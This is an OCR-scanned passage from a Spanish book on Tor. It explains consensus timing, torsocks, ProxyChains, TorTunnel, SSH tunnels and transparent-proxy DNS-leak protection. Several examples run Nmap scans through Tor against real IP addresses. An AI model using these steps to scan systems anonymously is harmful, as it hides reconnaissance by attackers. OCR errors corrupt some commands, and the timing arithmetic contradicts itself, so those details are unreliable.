9. VU: Llegado a este intervalo de tiempo, el consenso ya no es valido y por ende, es removido. 


Finalmente, el primer intervalo de votacion siempre comienza a la media noche 00:00 GMT. Una 
autoridad debe publicar su voto inmediatamente al inicio de cada intervalo de votacion menos el 
tiempo que conlleva generar el voto y la recoleccion de firmas, tal como se ha indicado anteriormente. 


4.2.6.2 Caches de directorio 

Las caches de directorio se encargan de consultar y almacenar los documentos de consenso generados 
por las autoridades de directorio. La principal funcion de estos servidores, tal como su nombre 
indica, es el de servir dichos documentos a los clientes, de tal forma que no requieran una conexion 
directa contra las autoridades de directorio. Las caches intentan descargar estos documentos de las 
autoridades pero para hacerlo, se deben cumplir las siguientes reglas: 

- Que la cache no tenga el ultimo documento de consenso generado por las autoridades de 
directorio. 

- Que el documento de consenso que se encuentra almacenado en la cache de directorio 
ya no sea valido, debido a que la fecha y hora actuales son mayores a la marca VU del 
documento. 
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Si ninguna de estas condiciones se cumple, la cache de directorio intentara descargar el nuevo 
documento de consenso en un rango de tiempo que varia entre el tiempo en el cual el documento ya 
no es “fresco” pero aun es valido, es decir, el periodo que se encuentra entre FU y VU. Por ejemplo, 
si una cache de directorio tiene un consenso que es valido a las 15:00 (VA) y esta fresco hasta las 
16:00 (FU), la cache intentara buscar un nuevo consenso de las autoridades entre las 16:00 y las 
16:30 (suponiendo que el valor de VU sea 16:30). 

4.2.6.3 Instancias cliente de Tor 

Como se ha visto, las autoridades de directorio y caches de directorio son elementos en la red 
de Tor que se encargan de suministrar los descriptores que los clientes necesitan para construir 
circuitos en Tor. Cuando un usuario en Internet descarga el software de Tor y ejecuta una instancia 
en su ordenador, dicho programa viene con la lista de autoridades de directorio que sera utilizada 
para descargar el ultimo consenso valido la primera vez que se conecta a la red y almacenara los 
consensos localmente. 

Cuando es requerido crear un nuevo circuito, la instancia tratara de buscar un documento de consenso 
reciente y en el caso de no tenerlo, intenta descargar el mas reciente que se encuentre disponible en 
una cache de directorio. En el caso de que falle la descarga de dicho documento, la instancia espera 
unos pocos segundos y posteriormente intenta con otra cache. Evidentemente si un cliente no tiene 
un documento de consenso no podra de ninguna manera construir ningun circuito, por lo tanto el 
arranque de la instancia de Tor fallara. 
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Imogen 04.22: Peticiones de los clientes a las autoridades y caches de directorio para obtener descriptores de los 

repetidores en la red. 
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Hay que tener en cuenta que la primera vez que se inicia una instancia de Tor, el cliente no tiene 
conocimiento de ninguna cache de directorio, por lo tanto la primera consulta por un documento de 
consenso se ejecutara directamente contra una de las autoridades de directorio incluidas en el listado 
que viene en el cliente y ademas, la entidad sera elegida de forma aleatoria. Una vez ejecutada esa 
primera peticion, el cliente obtiene informacion sobre las caches de directorio, por este motivo 
los clientes no necesitaran volver a consultar las autoridades de forma directa, en lugar de ello, 
realizaran consultas contra los directories de cache. 

Cuando un documento de consenso en una cache esta a punto de expirar, los clientes deben descargar 
nuevos documentos validos y para evitar inundar las caches con peticiones de clientes que esperan 
recibir dicho documento, los clientes eligen de forma aleatoria el momento en el que solicitaran 
dicho documento, que siempre sera en un punto despues de la marca FU y antes de la marca VU. 

Este tiempo aleatorio es un calculo simple que consta de dos limites, donde el limite inicial es la 
suma de FU con 3/4 en el primer intervalo entre VA y FU y el limite superior son 7/8 del tiempo 
restante entre el resultado del limite inicial y el valor de VU. Para entender dicho calculo, se ensena 
el siguiente ejemplo: 

Si un cliente tiene un documento de consenso cuya validez inicial comienza a las 15:00 (VA), esta 
fresco hasta las 16:00 (FU) y expira a las 18:00 (VU), el cliente realizara una consulta, buscando un 
nuevo consenso entre las 14:45 (limite inicial) y 17:50 (limite final), la explication es muy simple: 

Siendo VA= 15:00, FU = 16:00, VU = 18:00 
Limite Inicial = FU + ((FU — VA)*3/4) 

Limite Inicial = 16:00 + ((60 minutos)*3/4) 

Limite Inicial = 16:00 + (45 minutos) <=> 16:45 
Limite Final = Limite Inicial + ((Limite Inicial - VU) * 7/8) 

Limite Final = 16:45 + ((16:45 - 18:00) * 7/8) 

Limite Final = 16:45 + ((75 minutos) * 7/8) 

Limite Final = 16:45 + (65,625) <=> 17:50 

Finalmente, existen algunas restricciones que aplican a los clientes al momento de construir un 
circuito, las cuales se listan a continuacion: 

- No deberan usar enrutadores marcados como “ Non-Valid ” o “Non-Running" a menos que 
se indique explicitamente. 

- No deberan usar enrutadores marcados como “ Non-Fasf ’ para ningun otro proposito que 
no sea la construction de circuitos con latencias altas. 

- No deberan usar enrutadores “ Non-Stable ” para conexiones persistentes o de larga 
duration, tales como las que se establecen contra servidores SSH. 

- No deberan usar enrutadores “ Non-Guard ” cuando se seleccione nodos de entrada 
“Guard'. 

- No deberan consultar informacion de directorio desde caches “Non- V2Dir ”. 
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4.3 Gestion de servicios y complementos en Tor 

En las secciones anteriores se ha explicado los elementos fundamentals de la red, sin embargo 
existen algunos protocolos, configuraciones e incluso otras herramientas que aprovechan las 
funcionalidades basicas de cualquier instancia de Tor. En esta seccion se indicaran algunos de estos 
componentes y se explicara el por que son tan importantes para una configuration robusta de una 
instancia de Tor. 


4.3.1 Ejecucion de aplicaciones por medio de Tor (Torify) 

En ocasiones es importante poder ejecutar aplicaciones utilizando Tor como plataforma de anonimato, 
de esta forma, todas las peticiones que dichas aplicaciones ejecuten contra Internet, utilizaran un 
circuito. En la terminologia de Tor, el proceso de utilizar aplicaciones de terceros por medio de esta 
red, es conocido como “ torifing ”. Para conseguir dicho efecto, se pueden utilizar herramientas que 
han sido desarrolladas directamente por el equipo de Tor o por investigadores extemos, algunas de 
las mas conocidas y utilizadas se listan a continuation. 

4.3.1.1 TorSocks 

Se trata de una herramienta que permite enviar peticiones seguras por medio de la red de Tor 
utilizando un servidor proxy SOCKS, como por ejemplo Privoxy o Polipo. De forma implicita 
asegura que todos los comandos que se ejecuten utilizando TorSocks envien todos los paquetes 
del tipo TCP sobre la red Tor, rechazando todo el trafico generado por la aplicacion que utilice un 
protocolo distinto. TorSocks es un ‘ ‘fork ” de otra aplicacion llamada TSocks la cual a la fecha de 
redactar este documento se encuentra sin mantenimiento y desactualizada. El enfoque de TorSocks 
ha sido implementar y extender las funcionalidades de TSock, por esta razon algunas opciones de 
TSocks tambien se encuentran disponibles en TorSocks. Para instalar esta herramienta es necesario 
descargarla desde el siguiente enlace: https://gitweb.torproject.org/torsocks.git/. Posteriormente, es 
necesario configurar, empaquetar e instalar 

>./autogen.sh 
>. / configure 
>make 

>make install 

Este es el procedimiento mas sencillo para instalar la herramienta con las opciones por defecto, sin 
embargo, es posible personalizar el ejecutable generado por los comandos anteriores. Para ver un 
listado completo de las opciones que se pueden indicar en el script “./ configure ”, se recomienda leer 
el documento “ INSTALL ” que viene incluido en el proyecto. Despues de instalar. se pueden ver las 
opciones que se encuentran disponibles en la aplicacion. 

>./torsocks 
torsocks 2.1.0 

./torsocks [OPTIONS] [COMMAND [arg ...]] 
usage: ./torsocks command args 
Options: 
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-d, —debug 
-u, —user NAME 
-p, —pass NAME 
-i, —isolate 
on, off 


-h, —help 


—shell 
—version 


Show this help 
Spawn a torified shell 
Show version 
Set debug mode. 

Username for the S0CKS5 authentication 
Password for the S0CKS5 authentication 
Automatic tor isolation. Can't be used with -u/-p 
Set/Unset your shell to use Torsocks by default 

Make sure to source the call when using this option. (See Exam¬ 


ples) 

show, sh 


Show the current value of the LD PRELOAD 


Examples: 

Simple use of torsocks with SSH 

$ torsocks ssh user@host.com -p 1234 

Set your current shell in Tor mode. 

$ . torsocks on 

Please see torsocks(1), torsocks.conf(5) and torsocks(8) for more information. 

A continuation, es necesario establecer la variable de entomo “TORSOCKS CONF FILE ” ya que 
TorSocks intentara leer el fichero de configuration definido en dicha variable y en el caso de que no 
se encuentre establecida, intentara leer el fichero “/etc/torsocks”. Finalmente, si tampoco es capaz 
de leer el fichero “/ 'etc/torsocks ”, utilizara los valores por defecto mas habituales en instancias de 
Tor, como por ejemplo la interfaz local y el puerto “9050” para el servidor proxy SOCKS de Tor. Un 
fichero de ejemplo que puede ser utilizado para utilizar TorSocks es el siguiente: 

TorAddress 127.0.0.1 
TorPort 9150 

OnionAddrRange 127.42.42.0/24 
Allowlnbound 1 
AllowOutboundLocalhost 1 

A continuation se puede utilizar TorSocks para ejecutar programas o incluso, para “ torificar ” 
todos los comandos que se ejecutan desde una consola. Por ejemplo, en el caso de querer activar 
la ejecucion de comandos por medio de Tor utilizando una consola, se puede ejecutar el siguiente 
comando. 

>. torsocks on 

Tor mode activated. Every command will be torified for this shell. 

Con esto, todos los comandos ejecutados por medio de la consola utilizaran Tor para enviar y 
recibir paquetes de datos utilizando TCP. Evidentemente, es necesario tener una instancia de 
Tor ejecutandose en la maquina local y ademas, la interfaz y el puerto del proxy SOCKS que se 
han definido en el fichero de configuration deben coincidir con los valores del servidor SOCKS 
levantado por la instancia de Tor. A continuation, ya es posible ejecutar comandos por medio de la 
consola y todas las peticiones salientes hacia Internet utilizaran Tor como plataforma de anonimato. 

>wget -qO- http://ipecho.net/plain 2> /dev/null ; echo 
72.118.23.134 

>wget -qO- http://ipecho.net/plain 2> /dev/null ; echo 
86.18.135.15 
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En este caso se consulta un servicio en Internet para comprobar la direccion IP del cliente y como se 
puede apreciar, como cada petition ha utilizado un circuito distinto y el nodo de salida de cada uno 
de dichos circuitos, tiene una direccion IP distinta. 


4.3.1.2 tor-resolve 

Se trata de una herramienta auxiliar que permite realizar consultas DNS por medio de la red Tor 
utilizando protocolo TCP, de esta forma, en el caso de que se desee consultar la direccion IP de un 
determinado dominio, se puede utilizar esta herramienta sin exponer la identidad del cliente que 
utiliza Tor. La herramienta tor-resolve viene incluida con el software de Tor, se encuentra ubicada en 
el directorio “ <TOR_INSTALL>/src/tools /’ y su uso es bastante simple. 

>tor-resolve www.google.com 
74.125.43.104 

Solamente es necesario indicar el dominio que se desea consultar y tor-resolve intentara obtener la 
direccion IP de dicho dominio utilizando un circuito de Tor. 

4.3.1.3 ProxyChains 

ProxyChains es una herramienta util para enganchar dos o varios servidores proxy en una cadena 
de conexion. Cuando se crea una cadena de servidores proxy, es posible establecer como punto 
final una instancia de Tor, que como se recordara, puede tener un servidor proxy SOCKS esperando 
conexiones por parte de los clientes. De esta forma es posible enganchar servidores proxy como 
Polipo, Privoxy y el proxy de Tor para ejecutar escaneos con Nmap o establecer conexiones a 
servidores SSH, todo ello de forma anonima gracias al uso de Tor. Una de las principales ventajas 
de utilizar este programa, es que absolutamente todo el trafico viaja por medio de ProxyChains y la 
cadena de servidores proxy permite controlar los paquetes pueden Uegar al destino y los que no. Por 
ejemplo, desde el fichero de configuracion de proxychains “/etc/proxy chains.conf se puede declarar 
la option “proxy dns" que suprimira las peticiones DNS, con lo cual no habra fugas de information 
debido a consultas DNS no controladas. La ultima version disponible se puede descargar desde la 
siguiente rata: http://proxychains.sourceforge.net/ o tambien se puede obtener una version estable 
desde los repositories oficiales de las distribuciones basadas en Debian con el comando “apt-get”. 
>apt-get install proxychains 

Una vez instalado, se puede editar su fichero de configuracion que por defecto se encuentra ubicado 
en “ /etc/proxychains.conf'. En dicho fichero se debe especificar el orden en el que se deben encadenar 
cada uno de los servidores proxy que gestionara la herramienta. Concretamente, esta configuracion 
debe aplicarse en la section “[ProxyList]” 

Es posible utilizar herramientas como Nmap para ejecutar escaneos contra un objetivo determinado 
utilizando ProxyChains y un listado de servidores proxy. En tal caso, es necesario establecer que 
el metodo de conexion sera por TCP ( interruptor “sT”) y que no se realizaran peticiones ICMP ni 
DNS para el reconocimiento del objetivo ( interruptores “-P0”y “-Pn"). El comando se ejecutara 
completamente desde la red de Tor, por ejemplo: 
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>proxychains nmap -sT -PN -n -sV -p 80 216.58.210.142 
ProxyChains-3.1 (http://proxychains.sf.net) 

Starting Nmap 6.40 ( http://nmap.org ) at 2015-10-03 23:40 CEST 
| S-chain I -0-127.0.0.1: 9150-OO-216.58.210.142: 80-OO-OK 
| S-chain | -0-127.0.0.1: 9150-OO-216.58.210.142: 80-OO-OK 
Nmap scan report for 216.58.210.142 
Host is up (0.18s latency). 

PORT STATE SERVICE VERSION 

80/tcp open http Google httpd 2.0 (GFE) 

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

Service detection performed. Please report any incorrect results at http://nmap. 
org/submit/ . 

Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds 

En este caso concreto, las opciones utilizadas han sido las siguientes: 

- -sT: TCP Connect para realizar el escaneo. 

- -PN: Asumiendo que todos los host se encuentran online. 

- -n: No realizar resolucion DNS. 

- -sV: Version Scan: Para identificar la version de servicios encontrados. 

- -p: Listado de puertos a escanear. 

Como puede apreciarse en el ejemplo anterior, la conexion al servidor remoto se realiza por medio 
del servidor proxy local que se encuentra en ejecucion en el puerto 9150 y que corresponde al 
servidor proxy que se inicia con una instancia de Tor. 


4.3.1.4 TorTunnel 

TorTunnel es una herramienta que permite establecer un servidor SOCKS en la maquina local y 
posteriormente vincular las peticiones a un nodo de salida de la red Tor. Su objetivo principal es el de 
establecer una conexion anonima con el destino de una forma mucho mas rapida, esto debido a que 
las peticiones ya no pasaran por tres nodos distintos antes de llegar a su destino, sino que en lugar de 
esto, la peticion se realizara directamente desde el nodo de salida. De esta forma TorTunnel permite 
agilizar la comunicacion entre el origen y el destino. Aunque todas las peticiones pasan directamente 
entre el origen y el nodo de salida, dicho repetidor no tiene la capacidad de determinar que se trata 
del cliente, ya que para el nodo de salida, son peticiones que vienen desde otro nodo de la red de Tor, 
a pesar de esto, el hecho de que unicamente se realice un unico salto en lugar de tres, conlleva a que 
el nivel de anonimato no sea tan alto. 

La instalacion y uso de esta herramienta es muy simple, en primera instancia es necesario instalar 
las librerias BOOST y OpenSSL ya que son dependencias requeridas del programa. En sistemas 
basados en Debian se puede ejecutar el siguiente comando para instalar todas las dependencias 
opcionales y requeridas. 

>sudo apt-get install libtool automake libssl-dev gawk libboost-system-dev 
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A continuacion, se precede a descargar la herramienta desde su repositorio en Github. Para ello se 
ejecutan las siguientes instrucciones. 

>git clone git://github.com/moxieO/tortunnel.git 

>cd tortunnel 

>aclocal 

>autoconf 

>automake -add-missing 

>. /configure 

>make 


Con esto se crean los ejecutables de TorTunnel y ahora es momento de utilizar la herramienta, para 
ello se debe seleccionar un nodo de salida activo en la red. Es recomendable seleccionar uno en 
ftmcion a la version de Tor que utiliza y que tenga la flag “Exit Fasf\ Para encontrar un repetidor con 
estas caracteristicas, se puede utilizar el servicio “ Atlas ” de torproject. https://atlas.torproject.org/ 

Una vez seleccionado dicho repetidor, se puede lanzar la utilizar “ torpmxy" de la siguiente forma. 

>./torproxy 98.15.191.32 
torproxy 0.3 by Moxie Marlinspike. 

Retrieving directory listing... 

Connecting to exit node: 98.15.191.32 :443 

SSL Connection to node complete. Setting up circuit. 

Connected to Exit Node. SOCKS proxy ready on 5060. 

Como se puede apreciar, la ejecucion del comando anterior ha dado como resultado la creacion de 
un proxy SOCKS en el puerto 5060. Ahora es posible utilizar este proxy SOCKS desde el navegador 
web o desde linea de comandos utilizando proxychains. 

En el caso de utilizar proxychains, simplemente es necesario editar el fichero "/etc/proxy chains, 
conf' y en la seccion "ProxyList" incluir la siguiente configuracion: 

socks4a 127.0.0.1 5060 

De esta forma es posible ejecutar comandos como “ nmap ” para realizar escaneos contra una maquina 
remota de una forma mucho mas rapida. 

>proxychains nmap -sT -PN -n -p80,113,443,22 96.17.XX.XX 
ProxyChains-3.1 (http://proxychains.sf.net) 

Starting Nmap 5.51 ( http://nmap.org ) at 2011-0 96.17.XX.XX 8-30 01:05 CEST 
| S-chain | -0-127.0.0.1:5060-OO-96.17 .XX. XX: 443-OO-OK 
| S-chain|-0-127.0.0.1:5060-00-96.17.XX. XX: 80-oo-OK 
| S-chain | -0-127.0.0.1:5060-OO-96.17. XX .XX: 22-<—timeout 
| S-chain | -0-127.0.0.1:5060-OO-96.17. XX .XX: 113-<—timeout 
Nmap scan report for a96-17-156-35.XXXX.XXXX.com (96.17.XX.XX) 

Host is up (0.25s latency). 

PORT STATE SERVICE 
22/tcp closed ssh 
80/tcp open http 
113/tcp closed auth 
443/tcp open https 

Nmap done: 1 IP address (1 host up) scanned in 31.62 seconds 
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Los mensajes de log generados tras ejecutar el comando anterior son los siguientes: 

Got SOCKS Connection... 

Got SOCKS Request: 96.17.XX.XX:443 
Successfully opened Tor exit Node stream... 

CIRCUIT: Close called... 

Got SOCKS Connection... 

Got SOCKS Request: 96.17.XX.XX:80 
Successfully opened Tor exit Node stream... 

CIRCUIT: Close called... 

Got SOCKS Connection... 

Got SOCKS Request: 96.17.XX.XX:22 
Got SOCKS Connection... 

Got SOCKS Request: 96.17.XX.XX:113 
Error opening stream: system:111 

Como se puede apreciar, los puertos que se encuentran abiertos, han dado una respuesta positiva, 
mientras que en el caso de que el puerto se encuentre cerrado, el mensaje es “ Error opening stream: 
system: 111’’’ indicando que no se ha podido establecer la conexion con el sistema remoto en el puerto 
especificado. 


4.3.1.5 Cifrado punto a punto con SSH 

Es posible cifrar el trafico que viaja desde el origen hacia el destino utilizando la red de Tor, esto 
es especialmente importante a la hora de proteger la information que se envia a un destino de 
nodos maliciosos, como es el caso de un repetidor de salida controlado por un atacante. Con la 
implementation OpenSSH es posible crear tuneles que permitan enrutar y cifrar el trafico, una 
caracteristica muy valorada cuando se trata de utilizar circuitos en Tor. 

En este caso, el tunel en cuestion se encargara de recibir las peticiones por un puerto determinado 
y posteriormente las cifrara y enrutara por medio del servidor proxy SOCKS que se inicia en una 
instancia de Tor. A continuacion se ensenan los pasos que se deben seguir a la hora de establecer un 
puente local con OpenSSH y cifrar todas las peticiones que viajan por medio de dicho tunel. 

1. Utilizando TorTunnel, se inicia la conexion con un nodo de salida. Esto es opcional, pero como se 
visto en la section inmediatamente anterior, es algo que favorece el rendimiento de las conexiones 
que se establecen por medio de Tor. Tambien es perfectamente valido utilizar en este caso el proxy 
SOCKS de una instancia de Tor en lugar de utilizar el que genera TorTunnel. 

>./torproxy 98.15.191.32 
torproxy 0.3 by Moxie Marlinspike. 

Retrieving directory listing... 

Connecting to exit node: 98.15.191.32 :443 

SSL Connection to node complete. Setting up circuit. 

Connected to Exit Node. SOCKS proxy ready on 5060. 

2. A continuacion se debe iniciar el tunel en la maquina local. 

>ssh -L 6000:127.0.0.1:5060 -CN -f adastra@127.0.0.1 
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Con la instruction anterior el puente se ha creado correctamente y ahora en el puerto “6000” se 
encuentra en ejecucion el tunel local, el cual posteriormente realizara un ‘ ‘‘forward ’ de los paquetes 
recibidos al puerto 5060. 

3. Se procede a editar elfichero de configuration de proxychains ubicado en “/ etc/proxychains.conf ’ 
y se debe definir un nuevo servidor a la cadena de servidores proxy de la lista “[ProxyList]”. 

socks5 127.0.0.1 6000 

4. Se puede ejecutar un comando simple como Nmap con proxychains para probar el funcionamiento 
del tunel SSH. 

>proxychains nmap -P0 -n -sT -p80,22,443 74.125.93.147 
ProxyChains-3.1 (http://proxychains-sf.net) 

Starting Nmap 5.51 ( http://nmap.org ) at 2011-09-06 00:19 CEST 
| D-chain | -0-127.0.0.1: 6000-OO-74.125.93.147: 80-OO-OK 
| D-chain | -0-127.0.0.1: 6000-OO-74.125.93.147:443-OO-OK 
| D-chain | -0-127.0.0.1: 6000-OO-74.125.93.147:22-<—timeout 
Nmap scan report for 74.125.93.147 
Host is up (0.62s latency). 

PORT STATE SERVICE 
22/tcp closed ssh 
80/tcp open http 
443/tcp open https 

5. Finalmente, tras ver el trafico de paquetes en la interfaz local, se puede apreciar que viajan 
cifrados, pasando primero por SSH y posteriormente por TorTunnel. Utilizando una herramienta 
como Wireshark no es posible visualizar la information en texto claro, ya que todo esta cifrado 
desde su propio origen con SSH, por este motivo un atacante en un nodo de salida malicioso no 
tendra acceso a los paquetes de datos en crudo. 



Imogen 04.23: Captnra de paquetes de datos cifrados con OpenSSH v viajando por medio de la red de Tor. 
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Por otro lado, otra forma de realizar estas rnismas actividades, es utilizando la opcion “Socks5Proxy” 
en el fichero de configuracion de Tor. En este caso concreto, la propiedad de configuracion tendra 
el siguiente valor. 

Socks5Proxy 127.0.0.1:6000 

De esta forma, todo lo que viaje por Tor va a ir cifrado desde el origen, siendo este el mejor 
mecanismo y evidentemente el mas recomendado para asegurarse de que todos los paquetes viajan 
ciffados en cada nodo de la red, incluyendo el nodo de salida. 


4.3.2 Evitando DNS Leaks y fugas de informacion 

Las fugas de informacion por medio de peticiones DNS o simples “pings” contra un servidor remoto, 
constituyen un de los problemas mas comunes cuando se trabaja con Tor. Como seguramente el 
lector recordara, todas las peticiones que viajan por medio de un circuito en Tor, deben utilizar 
obligatoriamente el protocolo TCP ya que es el unico protocolo soportado por la red. No obstante, 
es bastante habitual encontrar aplicaciones como navegadores web que ejecutan peticiones DNS de 
forma automatica contra servicios en Internet para resolver su direccion IP o nombre de dominio. 
Dado que el protocolo DNS se apoya sobre UDP, dichas peticiones se ejecutaran de forma directa 
contra el objetivo, exponiendo de esta forma la direccion IP real del usuario. 

Por otro lado, tambien existen aplicaciones como es el caso de Nmap que tambien pueden ejecutar este 
tipo de peticiones o lanzar “pings” para comprobar la disponibilidad del objetivo y evidentemente, 
dado que las peticiones ‘‘‘'echo request ’ utilizan el protocolo ICMP, dichas peticiones tambien se 
ejecutaran de forma directa contra el objetivo, sin pasar por medio del circuito de Tor. 

Existen algunas directivas de configuracion que permiten crear un proxy transparente que permita 
el tratamiento dinamico de los paquetes que viajan por una interfaz de red especificada y ademas, es 
posible utilizar “ iptables ” para capturar y analizar el protocolo de los paquetes para posteriormente, 
ejecutar la redirection de todos aquellos que utilizan un protocolo distinto al TCP. Para conseguir 
esto se siguen los siguientes pasos: 

1. Se deben especificar las opciones de configuracion de Tor adecuadas, las cuales permitiran crear 
un servicio DNS para tratar todas las peticiones a nombres de dominio utilizando la red de Tor. A 
continuation, se indican rapidamente cuales son esas opciones de configuracion. 

1. AutomapHostsOnResolve: 

Cuando esta opcion se encuentra activa (con valor 1) se mapea cualquier petition que 
tenga al menos uno de los sufijos indicados en la opcion “ AutomapHostsSuffixes ” a una 
direccion virtual, esto a efectos practicos quiere decir que si se realiza una petition DNS 
para resolver un nombre de dominio. Tor se encargara de retomar una direccion IP virtual 
que servira de puente entre el nombre de dominio y el cliente. 

2. AutomapHostsSuffixes: 

Indica los sufijos que se utilizaran en la opcion “ AutomapHostsOnResolve ” para la 
asignacion dinamica de direcciones virtuales. Los valores por defecto de esta opcion son 
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“.exit” y “.onion”. Cuando se indica el valor de es equivalente a todas las direcciones 
o todos los nombres de dominio en todos los sufijos. 

3. DNSPort: 

Tor iniciara un servicio DNS para cualquier tipo de peticion de resolucion. Se asume un 
valor numerico, debe tenerse en cuenta que dicho valor es el puerto por el cual Tor iniciara 
el servicio, por esta razon debe encontrarse disponible. Por otro lado, tambien puede 
especificarse el valor de “auto” para que Tor escoja un puerto para iniciar el servicio. 

4. DNSListenAddress: 

La direccion IP en la que se iniciara el servicio DNS, cuando no se especifica esta opcion 
el valor por defecto es la direccion local (127.0.0.1). 

5. ClientDNSRejectlnternalAddress: 

Asume el valor de 0 o 1 (por defecto es 1) e indica que cualquier peticion DNS cuyo 
resultado sea una direccion IP interna, sera automaticamente rechazada. Esta opcion 
es importante dado que evita posibles ataques “ client-side ” que pueden darse contra 
navegadores web en sitios maliciosos. 

6. TransPort: 

Se utiliza para iniciar un servidor proxy transparente y permite especificar un puerto 
donde Tor esperara conexiones. En el sistema objetivo se debe utilizar un firewall 
que sirva como proxy transparente, como por ejemplo “ iptables” y que permitira que 
todas las peticiones entrantes sean redireccionadas al puerto indicado en esta opcion de 
configuracion. Por convencion se asigna el 9040, pero puede declararse cualquier otro. 
Esta opcion tambien requiere que se indique la opcion “VirtualAddrNetwork”. 

7. TransListenAddress: 

Asigna una direccion IP y un puerto para establecer conexiones a un proxy transparente 
que sera iniciado por la instancia de Tor. Esta opcion es util para declarar el proxy a todo 
el segmento de red y si no se especifica solamente aplica a la maquina local. 

8. VirtualAddrNetwork: 

El valor de esta opcion le permite a Tor utilizar una nueva direccion virtual, esta 
caracteristica es soportada por la propiedad de configuracion “ AutomapHostsOnResolve” 
vista unos parrafos mas arriba. 

Las opciones anteriores se incluyen en el fichero de configuracion “ torrc 

AutomapHostsOnResolve 1 
AutomapHostsSuffixes 
ControlPort 9051 
DataDirectory /home/adastra/tor 
DirPort 80 
DNSPort 53 

Log debug file /home/adastra/tor_data_directory/tor_log.log 
Transport 9040 

VirtualAddrNetwork 10.192.0.0/10 

2. A continuation se deben enrutar todas las peticiones hacia el proxy transparente, para ello se 
puede utilizar “ iptables ” en sistemas basados en Linux. 
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#!/bin/sh 

# destinations you don't want routed through Tor 
NON_TOR="192.168.1.0/24 192.168.0.0/24" 

# the UID Tor runs as 
TOR_UID="1000" 

# Tor's Transport 
TRANS_PORT=" 9040" 
iptables -F 
iptables -t nat -F 

iptables -t nat -A OUTPUT -m owner —uid-owner $TOR_UID -j RETURN 
for NET in $NON_TOR 127.0.0.0/9 127.128.0.0/10; do 
iptables -t nat -A OUTPUT -d $NET -j RETURN 

done 

iptables -t nat -A OUTPUT -p udp —dport 53 -j REDIRECT —to-ports 53 
iptables -t nat -A OUTPUT -p top —syn -j REDIRECT —to-ports $ TRANS_PORT 
iptables -A OUTPUT -m state —state ESTABLISHED,RELATED -j ACCEPT 
for NET in $NON_TOR 127.0.0.0/8; do 

iptables -A OUTPUT -d $NET -j ACCEPT 

done 

iptables -A OUTPUT -m owner —uid-owner $TOR_UID -j ACCEPT 
iptables -A OUTPUT -j REJECT 

El script anterior ha sido tornado de la documentation oficial de Tor y tal como se puede apreciar, en 
primer lugar se ha declarado el puerto que se encuentra en ejecucion el servidor proxy transparente, 
el cual debe coincidir con el valor establecido en el fichero de configuration de Tor (puerto “9040”). 
Por otro lado tambien se indica el UID del usuario que inicia Tor, que debe ser un usuario con 
privilegios limitados sobre el sistema y evidentemente no deberia ser el usuario “root” por razones 
de seguridad. Posteriormente se ejecutan las reglas de iptables necesarias. En este caso, todas las 
peticiones que se lleven a cabo dentro de la red de area local no necesitan pasar por medio del proxy 
transparente de Tor, por este motivo las conexiones que se lleven a cabo hacia una direction IP 
interna o en la maquina local, no encontraran ningun tipo de limitation o de filtrado. Por otra parte, 
las peticiones que cuyo destino sea Internet, deben pasar por medio del proxy transparente que se ha 
iniciado en el puerto “9040”. 

3. Con los pasos anteriores sera suficiente para tener el “ TransProxy ” activo y listo para ser utilizado, 
no obstante aun pueden existir fugas de information, especialmente cuando se realizan peticiones 
desde ciertas aplicaciones. A continuation, se listan un conjunto de recomendaciones adicionales 
para evitar DNS Leaks. 

1. Utilizar TorSocks cuando sea necesario ejecutar cualquier tipo de aplicacion desde 
consola, de esta forma cualquier petition que no viaje utilizando el protocolo TCP sera 
terminada adecuadamente. 

2. No realizar peticiones DNS ni ejecutar el comando “ping” de forma directa contra 
sistemas remotos. Se recomienda en cualquier caso, emplear la utilidad “ tor-resolve ” para 
poder resolver nombres de dominio o direcciones IP. 

3. Se recomienda utilizar el servidor DNS iniciado por una instancia de Tor que utilice 
las opciones de configuration “DNSPorf ’ y “ DNSListenAddress ” para resolver cualquier 
petition DNS que se realice. Para esto es necesario editar el fichero ‘7 etc/resolv.conf 
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en sistemas basados en Linux, el cual contiene el listado de “ nameservers ” que seran 
utilizados por el cliente para resolver un nombre de dominio a una direccion IP y viceversa. 
Evidentemente es el mejor mecanismo que se puede aplicar, no obstante es necesario que 
solamente exista un “noweserver” en dicho listado, el cual correspondera a la direccion 
local o aquella en la que se encuentra el servidor DNS de Tor en ejecucion, ademas de 
que el sistema entero dependera de que Tor se encuentre en ejecucion para que se puedan 
resolver nombres de dominio, lo que es necesario para poder navegar por Internet. En el 
fichero “ resolv.conf ’ debe existir el siguiente contenido en el caso de que el servidor DNS 
de Tor sea ejecutado localmente. 
nameserver 127.0.0.1 

Con esto sera suficiente para resolver cualquier nombre de dominio de forma anonima utilizando 
Tor, siendo un mecanismo sencillo, seguro y facil de implementar con el fin de evitar fugas de 
information. 


4.3.3 Protocolo de control de Tor 

EI protocolo de control de Tor es una especificacion independiente del protocolo “onion routing ” 
y define las normas que deben seguir los clientes y las interfaces de programacion que desean 
interactuar con una instancia local de Tor. Se trata de un protocolo bidireccional basado en el envio 
de mensajes, en donde un controlador actua como cliente y un proceso de Tor actua como servidor. 
El cliente debe abrir una conexion contra el puerto indicado en el proceso del Tor y a continuation. el 
cliente podra enviar una serie de comandos que se encuentran definidos en el protocolo. El servidor 
envia mensajes al cliente unicamente cuando ha habido una petition por parte del cliente, excepto en 
algunos casos en los que con determinados mensajes enviados por el cliente. se le indica al servidor 
que debe enviar respuestas de forma indefinida en periodos de tiempo fijos. 

Todos los comandos que puede enviar un cliente, por medio de un socket o una conexion TCP plana, 
se encuentran definidos en el documento oficial del protocolo, en donde se indica la forma en la que 
se deben hacer las consultas y el formato de los mensajes de respuesta que emite el servidor. Dicho 
documento se encuentra disponible en la siguiente direccion: https://gitweb.torproject.org/torspec. 
git/tree/control-spec.txt 

Es posible utilizar una herramienta como Telnet o Netcat para realizar la conexion con la instancia 
de Tor y posteriormente enviar comandos siguiendo la especificacion del protocolo de control, sin 
embargo ya existe una herramienta que implementa el protocolo en cuestion para obtener detalles 
sobre el funcionamiento de la instancia y monitorizar su comportamiento, dicha herramienta es 
conocida como ARM. 


4.3.3.1 Uso de ARM para monitorizar una instancia de Tor 

ARM es una herramienta que se ejecuta por linea de comandos y permite monitorizar el 
comportamiento y los eventos ocurridos en una instancia de Tor, funcionando de una forma muy 
similar a como lo hace el comando “top” en sistemas basados en Linux. Esta aplicacion se encuentra 
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escrita en python y no necesita un proceso de construccion/compilacion e instalacion previo siendo 
muy sencillo su uso. Para descargar la herramienta se puede utilizar “APT” en distribuciones basadas 
